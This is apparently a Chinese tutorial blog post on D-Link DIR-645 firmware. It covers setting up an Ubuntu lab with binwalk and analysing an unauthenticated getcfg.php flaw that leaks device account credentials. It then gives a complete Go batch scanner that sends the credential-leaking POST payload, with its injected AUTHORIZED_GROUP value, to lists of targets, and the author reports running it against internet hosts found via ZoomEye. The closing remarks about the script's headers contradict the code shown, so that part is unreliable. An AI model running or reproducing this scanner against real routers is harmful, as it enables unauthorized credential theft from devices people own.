路由器固件下的小试牛刀,与漏洞相关的经验分享

本篇文章以路由器固件相关漏洞来演示,从0到1分享经验。

本地虚拟机搭建ubuntu 16.04

ubuntu iso下载地址:http://mirrors.aliyun.com/ubuntu-releases/

安装完,给 root 用户设置一个密码(Ubuntu 默认禁用 root 直接登录;这里只是为了实验方便,实际环境建议保持禁用,用 `sudo -i` 获取 root shell 即可。下文所有命令默认以 root 身份执行)

sudo passwd root


切换到root用户

su root

修改阿里云镜像:

vi /etc/apt/sources.list

打开文件不要做任何操作,直接输入 ggdG 清空当前文件内容,注意 G 是大写

ggdG

然后粘贴以下内容

#deb cdrom:[Ubuntu 16.04 LTS Xenial Xerus - Release amd64 (20160420.1)]/ xenial main restricted
deb-src http://archive.ubuntu.com/ubuntu xenial main restricted #Added by software-properties
deb http://mirrors.aliyun.com/ubuntu/ xenial main restricted
deb-src http://mirrors.aliyun.com/ubuntu/ xenial main restricted multiverse universe #Added by software-properties
deb http://mirrors.aliyun.com/ubuntu/ xenial-updates main restricted
deb-src http://mirrors.aliyun.com/ubuntu/ xenial-updates main restricted multiverse universe #Added by software-properties
deb http://mirrors.aliyun.com/ubuntu/ xenial universe
deb http://mirrors.aliyun.com/ubuntu/ xenial-updates universe
deb http://mirrors.aliyun.com/ubuntu/ xenial multiverse
deb http://mirrors.aliyun.com/ubuntu/ xenial-updates multiverse
deb http://mirrors.aliyun.com/ubuntu/ xenial-backports main restricted universe multiverse
deb-src http://mirrors.aliyun.com/ubuntu/ xenial-backports main restricted universe multiverse #Added by software-properties
deb http://archive.canonical.com/ubuntu xenial partner
deb-src http://archive.canonical.com/ubuntu xenial partner
deb http://mirrors.aliyun.com/ubuntu/ xenial-security main restricted
deb-src http://mirrors.aliyun.com/ubuntu/ xenial-security main restricted multiverse universe #Added by software-properties
deb http://mirrors.aliyun.com/ubuntu/ xenial-security universe
deb http://mirrors.aliyun.com/ubuntu/ xenial-security multiverse

更新镜像源(注意:sources.list 每个 deb/deb-src 条目必须单独占一行;不同 Ubuntu 版本的代号和镜像源也不一样。镜像用 http 是可以接受的,因为 apt 会用 Ubuntu 官方归档密钥校验 InRelease/Release 的签名来保证完整性,但不要为了省事给条目加 `[trusted=yes]` 之类的选项绕过签名校验)

sudo apt-get update

安装python3.7

因为ubuntu 16.04带的python是3.5的,而 Binwalk 要求3.6以上。

sudo add-apt-repository ppa:deadsnakes/ppa
sudo apt-get update
sudo apt-get install python3.7

(deadsnakes 是第三方 PPA,`add-apt-repository` 会把它的签名密钥加入 apt 的信任列表,之后该源发布的任何包都会被信任;只在实验虚拟机里这么做。)

修改系统默认 `python3` 的指向

sudo update-alternatives --install /usr/bin/python3 python3 /usr/bin/python3.5 1
sudo update-alternatives --install /usr/bin/python3 python3 /usr/bin/python3.7 2

update-alternatives 命令可以修改系统默认命令的软链指向,通过以下命令可以切换 python3 的指向。注意:16.04 自带的 apt/系统工具(例如 python3-apt、add-apt-repository)是针对 python3.5 构建的,把全局 python3 切到 3.7 后它们可能报错;更稳妥的做法是只在需要时显式调用 `python3.7`(或用 `python3.7 -m venv` 建虚拟环境),apt 出问题时再用下面的命令切回 3.5

sudo update-alternatives --config python3

查看一下是否安装成功:

检测版本:

python3 -V


安装binwalk(也可翻到后文直接使用自动化工具《自动安装binwalk》)

git clone https://github.com/ReFirmLabs/binwalk.git
cd binwalk
sudo ./deps.sh
sudo python3 setup.py install

(`deps.sh` 会以 root 身份安装一大批第三方依赖并执行脚本,运行前先看一眼内容;`setup.py install` 用的是上一步切换后的 python3,确保它指向 3.7。)

安装unzip

apt install unzip

解压缩固件

unzip DLink_DIR645_A1_FW102B08.zip


(原文此处为截图)解压完成后可以看到固件包已成功解开,得到固件根文件系统目录

DIR-645信息泄露

比如,这里是 DIR-645 的固件包,我们直接去看 web 目录下的 getcfg.php 文件。这个文件本身不做任何登录/会话校验,只读取 POST 中的 CACHE 和 SERVICES 两个参数:

HTTP/1.1 200 OK

Content-Type: text/xml

<?echo "<?xml version=\"1.0\" encoding=\"utf-8\"?>";?>
<?

/*
 * Request dispatcher from the DIR-645 web UI (getcfg.php).
 * Nothing in this file checks a session or a login: the only inputs it
 * consults are $_POST["CACHE"] and $_POST["SERVICES"], and both are used
 * as-is.
 */
if ($_POST["CACHE"] == "true")
{
    /* Dumps the cached POST XML stored under the current session id. */
    echo dump(1, "/runtime/session/".$SESSION_UID."/postxml");
}
else
{
    /* cut_count() will return 0 when no or only one token. */
    /* NOTE(review): if the comment above were literally true, a single
     * comma-less SERVICES value such as "DEVICE.ACCOUNT" would never be
     * loaded, yet that is exactly what the PoC below sends — the comment is
     * probably stale; confirm cut_count()'s semantics in the firmware. */
    $SERVICE_COUNT = cut_count($_POST["SERVICES"], ",");
    TRACE_debug("GETCFG: got ".$SERVICE_COUNT." service(s): ".$_POST["SERVICES"]);
    $SERVICE_INDEX = 0;
    while ($SERVICE_INDEX < $SERVICE_COUNT)
    {
        /* Each comma-separated token of SERVICES is taken verbatim from the POST body. */
        $GETCFG_SVC = cut($_POST["SERVICES"], $SERVICE_INDEX, ",");
        TRACE_debug("GETCFG: serivce[".$SERVICE_INDEX."] = ".$GETCFG_SVC);
        if ($GETCFG_SVC!="")
        {
            /* The token is spliced into the include path with no validation
             * or allow-list; the appended ".xml.php" suffix is the only
             * constraint on what gets selected (no traversal filtering is
             * visible here either). Any script under /htdocs/webinc/getcfg/
             * is therefore reachable by an unauthenticated POST, and each
             * child script is on its own to enforce authorization — the
             * write-up reports that DEVICE.ACCOUNT.xml.php returns the
             * username and password. */
            $file = "/htdocs/webinc/getcfg/".$GETCFG_SVC.".xml.php";
            /* GETCFG_SVC will be passed to the child process. */
            if (isfile($file)=="1") dophp("load", $file);
        }
        $SERVICE_INDEX++;
    }
}
?>

看源码可以发现:getcfg.php 自己不做任何鉴权,直接把 POST 里 SERVICES 的每个逗号分隔项拼成 /htdocs/webinc/getcfg/<名字>.xml.php,只要文件存在就 dophp 加载。于是未登录也能指定 SERVICES=DEVICE.ACCOUNT 让设备加载 /htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml.php,而该文件会把用户名和密码一起输出,造成信息泄露。(PoC 里额外注入的 `%0aAUTHORIZED_GROUP=1` 推测是用来满足子脚本内部的授权变量检查,具体以该子脚本源码为准。)

批量检测脚本

直接撸一个poc

package main

import (
	"bufio"
	"crypto/tls"
	"flag"
	"fmt"
	"io"
	"io/ioutil"
	"net/http"
	"os"
	"strings"
	"sync"
	"time"

	"github.com/fatih/color"
)

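// exec probes one target for the DIR-645 getcfg.php information disclosure
// and prints a coloured verdict. targetURL may be given with or without a
// scheme (a bare host is treated as http://) and with or without a trailing
// slash. isbatch is kept for signature compatibility with main; the verdict
// is printed the same way in single and batch mode (the original only ever
// reported a hit in batch mode, and then also printed "不存在漏洞" for it).
func exec(targetURL string, isbatch bool) {
	vulnerable, err := checkTarget(targetURL)
	switch {
	case err != nil:
		// An unreachable host or a malformed URL is not evidence either way;
		// report it instead of silently dropping the target from the output.
		color.Red("%s 请求失败: %v\n", targetURL, err)
	case vulnerable:
		color.Blue("%s 存在漏洞\n", targetURL)
	default:
		color.Red("%s 不存在漏洞\n", targetURL)
	}
}

// checkTarget sends the unauthenticated getcfg.php probe and reports whether
// the response body carries the DEVICE.ACCOUNT module — which, per the
// write-up, DEVICE.ACCOUNT.xml.php emits together with the credentials.
// It returns an error only for a malformed URL or a failed HTTP exchange;
// any non-200 status (including 404) is reported as "not vulnerable".
func checkTarget(targetURL string) (bool, error) {
	// SERVICES selects the child script getcfg.php will include. The
	// %0a-injected AUTHORIZED_GROUP=1 presumably satisfies an authorization
	// variable check inside that child script — not shown in this write-up,
	// verify against the firmware.
	const postData = `SERVICES=DEVICE.ACCOUNT&attack=true%0aAUTHORIZED_GROUP=1`

	// Accept bare hosts, but only treat an explicit scheme prefix as a URL;
	// the original substring test for "http" misclassified hosts such as
	// "httpd.lan" and then handed an unschemed string to net/http.
	if !strings.HasPrefix(targetURL, "http://") && !strings.HasPrefix(targetURL, "https://") {
		targetURL = "http://" + targetURL
	}
	// Avoid "http://host//getcfg.php" when the list contains trailing slashes.
	targetURL = strings.TrimRight(targetURL, "/")

	cli := &http.Client{
		// Without a deadline one black-holed host stalls a batch run forever.
		Timeout: 10 * time.Second,
		Transport: &http.Transport{
			// Embedded devices ship self-signed certificates, so verification is
			// deliberately skipped. The peer is therefore NOT authenticated;
			// never reuse this client for anything where that matters.
			TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
		},
	}

	req, err := http.NewRequest(http.MethodPost, targetURL+"/getcfg.php", strings.NewReader(postData))
	if err != nil {
		// The original printed the error and carried on, dereferencing a nil *Request.
		return false, err
	}
	req.Header.Set("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0")
	req.Header.Set("Connection", "close")
	req.Header.Set("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
	req.Header.Set("Upgrade-Insecure-Requests", "1")
	req.Header.Set("Accept-Language", "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2")
	// The body is form-encoded, so declare it; $_POST parsing on the device may
	// depend on it. Accept-Encoding is intentionally NOT set by hand: once the
	// caller sets it, net/http stops transparently gunzipping the response and
	// the substring match below silently fails on a compressed reply.
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")

	resp, err := cli.Do(req)
	if err != nil {
		return false, err
	}
	defer resp.Body.Close()

	if resp.StatusCode != http.StatusOK {
		return false, nil
	}
	// Cap the read: a hostile or misconfigured host must not be able to make
	// the scanner buffer an unbounded body.
	body, err := ioutil.ReadAll(io.LimitReader(resp.Body, 1<<20))
	if err != nil {
		return false, err
	}
	return strings.Contains(string(body), "DEVICE.ACCOUNT"), nil
}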

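// main is the CLI entry point: -u probes a single target, -l reads one target
// per line from a file and probes them concurrently. Batch mode is bounded to
// maxWorkers in-flight probes so a large list does not open thousands of
// sockets at once, and it waits for every started probe before exiting
// (the original returned without waiting on a read error and also spawned a
// probe for the empty string after the final newline).
func main() {
	var targetURL, listPath string
	flag.StringVar(&targetURL, "u", "", "single target URL or host")
	flag.StringVar(&listPath, "l", "", "file with one target per line")
	flag.CommandLine.Usage = func() { fmt.Println("使用说明:\n执行命令:./main -u http://127.0.0.1:8080 \n批量检测:./main -l url.txt ") }
	flag.Parse()

	// Single-target mode wins whenever -u is given, as before.
	if len(targetURL) != 0 {
		exec(targetURL, false)
		return
	}
	if len(listPath) == 0 {
		flag.Usage()
		return
	}

	// Read-only is all we need; the original opened the list O_RDWR.
	file, err := os.Open(listPath)
	if err != nil {
		fmt.Println("Open file error!", err)
		return
	}
	defer file.Close()

	const maxWorkers = 32
	sem := make(chan struct{}, maxWorkers) // counting semaphore for in-flight probes
	var wg sync.WaitGroup
	reader := bufio.NewReader(file)
	for {
		line, readErr := reader.ReadString('\n')
		// ReadString hands back a final unterminated line together with io.EOF,
		// so the target is dispatched before the error is examined.
		target := strings.TrimSpace(line)
		if target != "" { // skip blank lines and the empty tail after a final newline
			wg.Add(1)
			sem <- struct{}{}
			go func(t string) {
				defer wg.Done()
				defer func() { <-sem }()
				exec(t, true)
			}(target)
		}
		if readErr != nil {
			if readErr != io.EOF {
				fmt.Println("Read file error!", readErr)
			}
			break // still wait for the probes already started
		}
	}
	wg.Wait()
}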

用 ZoomEye 在互联网上搜到的一批 IP 跑了一遍,一个都没命中,哈哈哈,尴尬。(两点提醒:一是未经授权对互联网上的设备做批量探测本身有法律风险,只应对自己拥有或获得书面授权的设备测试;二是上面的脚本有几个会导致漏报的问题——手动设置了 `Accept-Encoding: gzip` 之后 Go 的 net/http 不再自动解压响应体,字符串匹配会失败;请求没有带 `Content-Type: application/x-www-form-urlencoded`;命中后还会接着打印“不存在漏洞”——所以“零命中”并不能说明目标都已经修复。)


当然,毕竟是虚拟环境,很多情况下会遇到各种各样的问题,所以有条件的还是买真机来调试吧【想领取网络安全资料的朋友才能点】
